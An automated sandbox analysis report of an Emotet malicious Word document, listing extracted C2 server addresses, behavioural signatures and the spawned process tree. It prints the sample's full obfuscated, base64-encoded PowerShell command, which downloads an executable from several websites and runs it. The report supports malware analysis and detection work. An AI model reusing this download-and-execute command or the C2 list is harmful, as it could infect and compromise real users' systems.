Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

task1

 

10

task2

 

5

Analysis

  • max time kernel
    147s
  • max time network
    157s
  • resource
    win7

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_129a4380ebaff7cfc82bfe05e7d282ff.8

  • Sample

    191016-e861zcd1g2

  • SHA256

    012987f43b78cbbd7648fd8fbd4660423486e120f0a42cb155b0169a1f928e45

Score
N/A

Malware Config

Extracted

Family

emotet

C2

181.59.253.20:21

14.160.93.230:80

74.208.68.48:8080

104.131.58.132:8080

68.183.190.199:8080

62.75.143.100:7080

159.203.204.126:8080

151.80.142.33:80

123.168.4.66:22

46.28.111.142:7080

46.101.212.195:8080

183.82.97.25:80

190.10.194.42:8080

217.199.160.224:8080

186.1.41.111:443

185.86.148.222:8080

185.187.198.10:8080

200.57.102.71:8443

114.79.134.129:443

80.85.87.122:8080
rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener
  • Suspicious use of SetWindowsHookEx
  • Drops Office document 5 IoCs
    dropperexploitermaldoc
  • Drops file in system dir 7 IoCs
  • Modifies registry class 1 TTPs 280 IoCs
    persistence
  • Suspicious use of FindShellTrayWindow
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses
  • Uses Task Scheduler COM API 1 TTPs 12 IoCs
    persistence
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Executes dropped EXE
  • Emotet Sync 1 IoCs
    trojanbanker
  • Suspicious behavior: EmotetMutantsSpam
  • Loads dropped DLL
  • emotet family
    family

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_129a4380ebaff7cfc82bfe05e7d282ff.8.doc"
    1⤵
    • Drops Office document
    • Drops file in system dir
    • Modifies registry class
    PID:1972
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAEQARABCAEEARwBRAEEANABBADEAQQBBAD0AJwBBAHcAQQBCAEMAeABBAEcARwBBACcAOwAkAEIAQQBBAFgAVQBfAHgAdwAxACAAPQAgACcANQAwADYAJwA7ACQAVwBBADQAQQBBAEEAQwBCAEQAXwBCAFEAPQAnAFUAawBBAEQAMQB3AGMAXwAnADsAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQgBBAEEAWABVAF8AeAB3ADEAKwAnAC4AZQB4AGUAJwA7ACQAVABDAEEAWgBBAEcAVQBBAD0AJwBKAEMAXwBBAEEAVQB4AEIAQQBRAEIAUQAnADsAJABSAHgAVQBBAEEANABVAHcAUQBBAEEAQQB3AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABDAEEAWgAxAFUANABBAEIARwBfAEEAQQBBAD0AJwBoAHQAdABwAHMAOgAvAC8AeQBvAHUAcgBnAHAAcwBoAGUAbABwAGUAcgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBoADYAMgAyADgANAAwADAALwAqAGgAdAB0AHAAcwA6AC8ALwBrAHkAbwBrAHUAcwBoAGkAbgBtAGkAZABkAGwAZQBlAGEAcwB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZAA0AGgAbwBiAHMAOAA4ADkALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGEAbQBhAGsAbwBzAGgAaQBzAGEAbgBjAGgAYQByAC4AYwBvAG0ALwBoAHQAaAB6ADkAMQAvAGsANgBpAGwAeQBjAHgAMwA1ADMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGUAcgBnAGEAbQBhAGUAZwBlAHMAbwBuAGQAYQBqAC4AYwBvAG0ALwAxAHQAMgAwADEAMQAxAHkANgAzAC8AaQBjADUANQAwADEALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG8AcgBnAGEAbgBpAHoAZQByAHMAbwBuAGQAZQBtAGEAbgBkAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANgB2AHQAZAA3ADMAMAA0AC8AJwAuACIAcwBwAEwAYABpAFQAIgAoACcAKgAnACkAOwAkAEcAUQBDAEQAWAB3AFEAVQBCAFEAQQBCAGsAPQAnAFMAQQBBAEIAQQBHAG8ARwBaAEEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAeAB4ADEAXwBCAEEAdwBBAEEAQQAgAGkAbgAgACQAQwBBAFoAMQBVADQAQQBCAEcAXwBBAEEAQQApAHsAdAByAHkAewAkAFIAeABVAEEAQQA0AFUAdwBRAEEAQQBBAHcALgAiAEQAYABvAFcATgBsAGAATwBhAGQARgBpAGAATABFACIAKAAkAFkAeAB4ADEAXwBCAEEAdwBBAEEAQQAsACAAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQApADsAJABLAEIAQQBaAEMAUQBjAEEAbwA9ACcATgBjAGMAYwBEAEEAQwBBACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVQBEAFUAYwBfAEEAQQAxAEEAXwBBADEAKQAuACIAbABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADIANQAzADYANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAFIAdAAiACgAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQApADsAJABZAFUAQQB3AFUAMQBEAG8APQAnAEgAeABVAEIAQQBBAEQAQQBBACcAOwBiAHIAZQBhAGsAOwAkAFoAeAAxAEIAQQBVAFEAQQBCAGsAQQA9ACcAWABBAEEAVQBBAFUAbwBjADEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA0AFUAMQBvAEIAVQBrAFUAPQAnAFIAXwBBAGMANAA0AEEAbwBEAEcARABrAEcAJwA=
    1⤵
    • Drops file in system dir
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1764
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1397831352-2096396082-121285782417681909661895379462009018910-156616313-323503274"
    1⤵
      PID:1808
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
      • Uses Task Scheduler COM API
      PID:1916
    • C:\Users\Admin\506.exe
      "C:\Users\Admin\506.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1384
    • C:\Users\Admin\506.exe
      --dec73219
      1⤵
      • Drops file in system dir
      • Emotet Sync
      PID:1508
    • C:\Windows\SysWOW64\loadarouter.exe
      "C:\Windows\SysWOW64\loadarouter.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1644
    • C:\Windows\SysWOW64\loadarouter.exe
      --f7a216da
      1⤵
      • Drops file in system dir
      • Suspicious use of WriteProcessMemory
      PID:1616
    • C:\Windows\SysWOW64\P9nv4EcgV49GGKm8.exe
      "C:\Windows\SysWOW64\P9nv4EcgV49GGKm8.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1672
    • C:\Windows\SysWOW64\P9nv4EcgV49GGKm8.exe
      --7212a3d3
      1⤵
        PID:1120

      Network

      MITRE ATT&CK Enterprise v16

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1120-24-0x0000000000400000-0x000000000049F000-memory.dmp

        Filesize

        636KB

        Download

      • memory/1120-23-0x00000000003D0000-0x00000000003E7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1384-7-0x0000000000290000-0x00000000002A7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1508-10-0x0000000000240000-0x0000000000257000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1508-11-0x0000000000400000-0x000000000049F000-memory.dmp

        Filesize

        636KB

        Download

      • memory/1616-15-0x00000000003E0000-0x00000000003F7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1616-16-0x0000000000400000-0x000000000049F000-memory.dmp

        Filesize

        636KB

        Download

      • memory/1644-13-0x00000000004F0000-0x0000000000507000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1672-20-0x0000000000630000-0x0000000000647000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1972-0-0x0000000006140000-0x0000000006144000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1972-3-0x0000000006331000-0x0000000006335000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1972-2-0x00000000063D6000-0x00000000063D8000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1972-1-0x0000000006331000-0x0000000006335000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1972-4-0x0000000006331000-0x0000000006335000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1972-5-0x00000000063D2000-0x00000000063D6000-memory.dmp

        Filesize

        16KB

        Download